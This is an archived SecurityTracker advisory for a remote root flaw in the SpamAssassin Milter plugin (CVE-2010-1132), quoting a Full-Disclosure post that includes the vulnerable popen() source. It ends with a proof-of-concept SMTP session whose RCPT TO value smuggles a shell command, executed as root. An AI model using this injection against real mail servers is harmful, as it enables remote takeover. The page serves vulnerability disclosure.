SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   SpamAssassin Milter Plugin Vendors:   Nelson, Dan, et al
SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1023691
SecurityTracker URL:  http://securitytracker.com/id/1023691
CVE Reference:   CVE-2010-1132   (Links to External Site)
Updated:  Mar 31 2010
Original Entry Date:  Mar 8 2010
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 0.3.1; possibly earlier versions
Description:   A vulnerability was reported in SpamAssassin Milter Plugin. A remote user can execute arbitrary code on the target system.

When the software is invoked with the expand (-x) flag, the software makes an unsafe popen() call. A remote user can send a specially crafted RCPT TO value to execute arbitrary code on the target system. The code will run with the privileges of the target service.

Kingcope reported this vulnerability.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  savannah.nongnu.org/projects/spamass-milt/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Date:  Sun, 07 Mar 2010 20:17:14 +0100
Subject:  [Full-disclosure] Spamassassin Milter Plugin Remote Root


--===============2040623599==
Content-Type: multipart/alternative; boundary="=-txLfaugnO9ZsZKEBVTeh"


--=-txLfaugnO9ZsZKEBVTeh
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 7bit

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
                /* open a pipe to sendmail so we can do address
expansion */

                char buf[1024];
                char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
                snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
                /* XXX possible buffer overflow here // is this a
joke ?! */
                sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

                debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
                rv = pthread_mutex_lock(&popen_mutex);
                if (rv)
                {
                        debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
                        abort();
                }
#endif

                p = popen(buf, "r");				[1]
                if (!p)
                {
                        debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));
                        assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

--=-txLfaugnO9ZsZKEBVTeh
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">
<HTML>
<HEAD>
  <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">
  <META NAME="GENERATOR" CONTENT="GtkHTML/3.28.1">
</HEAD>
<BODY>
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE)<BR>
aka the postfix_joker advisory<BR>
<BR>
Logic fuckup?<BR>
<BR>
March 07 2010 // if you read this 10 years later you are definetly<BR>
seeking the nice 0days!<BR>
<BR>
Greetz fly out to alex,andi,adize :D<BR>
+++ KEEP IT ULTRA PRIV8 +++<BR>
<BR>
Software<BR>
+-+-+-+-+<BR>
Apache Spamassassin<BR>
SpamAssassin is a mail filter which attempts to identify spam using<BR>
a variety of mechanisms including text analysis, Bayesian filtering,<BR>
DNS blocklists, and collaborative filtering databases.<BR>
<BR>
SpamAssassin is a project of the Apache Software Foundation (ASF).<BR>
<BR>
Postfix<BR>
What is Postfix? It is Wietse Venema's mailer that started life at IBM<BR>
research as an alternative to the widely-used Sendmail program.<BR>
Postfix attempts to be fast, easy to administer, and secure.<BR>
The outside has a definite Sendmail-ish flavor, but the inside is completely different.<BR>
<BR>
Spamassassin Milter<BR>
A little plugin for the Sendmail Milter (Mail Filter) library<BR>
that pipes all incoming mail (including things received by rmail/UUCP)<BR>
through the SpamAssassin, a highly customizable SpamFilter.<BR>
<BR>
Remote Code Execution Vulnerability<BR>
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<BR>
<BR>
The Spamassassin Milter Plugin can be tricked into executing any command as the root user remotely.<BR>
If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied <BR>
recipient (RCPT TO).<BR>
<BR>
>From spamass-milter-0.3.1 (-latest) Line 820:<BR>
<BR>
//<BR>
// Gets called once for each recipient<BR>
//<BR>
// stores the first recipient in the spamassassin object and<BR>
// stores all addresses and the number thereof (some redundancy)<BR>
//<BR>
<BR>
sfsistat<BR>
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)<BR>
{<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct context *sctx = (struct context*)smfi_getpriv(ctx);<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SpamAssassin* assassin = sctx-&gt;assassin;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FILE *p;<BR>
#if defined(__FreeBSD__)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int rv;<BR>
#endif<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; debug(D_FUNC, &quot;mlfi_envrcpt: enter&quot;);<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (flag_expand)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* open a pipe to sendmail so we can do address expansion */<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char buf[1024];<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char *fmt=&quot;%s -bv \&quot;%s\&quot; 2&gt;&amp;1&quot;;<BR>
<BR>
#if defined(HAVE_SNPRINTF)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);<BR>
#else<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* XXX possible buffer overflow here // is this a joke ?! */<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sprintf(buf, fmt, SENDMAIL, envrcpt[0]);<BR>
#endif<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; debug(D_RCPT, &quot;calling %s&quot;, buf);<BR>
<BR>
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; rv = pthread_mutex_lock(&amp;popen_mutex);<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (rv)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; debug(D_ALWAYS, &quot;Could not lock popen mutex: %s&quot;, strerror(rv));<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; abort();<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<BR>
#endif<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; p = popen(buf, &quot;r&quot;);				[1]<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (!p)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; debug(D_RCPT, &quot;popen failed(%s).&nbsp; Will not expand aliases&quot;, strerror(errno));<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; assassin-&gt;expandedrcpt.push_back(envrcpt[0]);<BR>
<BR>
<BR>
[1] the vulnerable popen() call.<BR>
<BR>
Remote Root Exploit PoC through postfix<BR>
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<BR>
<BR>
$ nc localhost 25<BR>
220 ownthabox ESMTP Postfix (Ubuntu)<BR>
mail from: <A HREF="mailto:me@me.com">me@me.com</A><BR>
250 2.1.0 Ok<BR>
rcpt to: root+:&quot;|touch /tmp/foo&quot;<BR>
250 2.1.5 Ok<BR>
<BR>
$ ls -la /tmp/foo<BR>
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo<BR>
<BR>
Signed,<BR>
<BR>
Kingcope
</BODY>
</HTML>

--=-txLfaugnO9ZsZKEBVTeh--


--===============2040623599==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============2040623599==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC